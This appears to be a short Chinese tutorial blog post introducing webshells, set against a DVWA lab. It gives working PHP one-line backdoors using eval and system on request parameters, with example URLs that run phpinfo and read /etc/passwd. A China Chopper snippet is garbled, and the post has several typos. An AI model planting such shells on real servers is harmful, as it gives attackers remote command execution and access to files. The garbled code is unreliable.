Webshell

webshell

webshell简介:

  • webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、故武器管理等待一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,然后通过页面访问的形式进行入侵,或者通过插入一句话连接本地的一些相关工具直接对服务器进行入侵操作。
  • webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。
  • 小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数
  • 大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到
shell2.php	#eveal 使用php函数,例如phpinfo();
<?php eval($_REQUEST['cmd']);?>
http://192.168.8.134/dvwa/hackable/uploads/shell2.php?cmd=phpinfo();

在这里插入图片描述

shell3.php  #systeam使用linux系统命令,例如ls,cp,rm
<?php system($_REQUEST['yangge']);?>
http://192.168.8.134/dvwa/hackable/uploads/shell3.php?yangge=cat /etc/passwd

在这里插入图片描述

  • 中国菜刀
<?php @eval('$-PSOT[chopper']);?>
说明:requesr是在网页端输入变量访问,POST则是使用想中国菜刀之类的工具连接,是C/S架构。

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值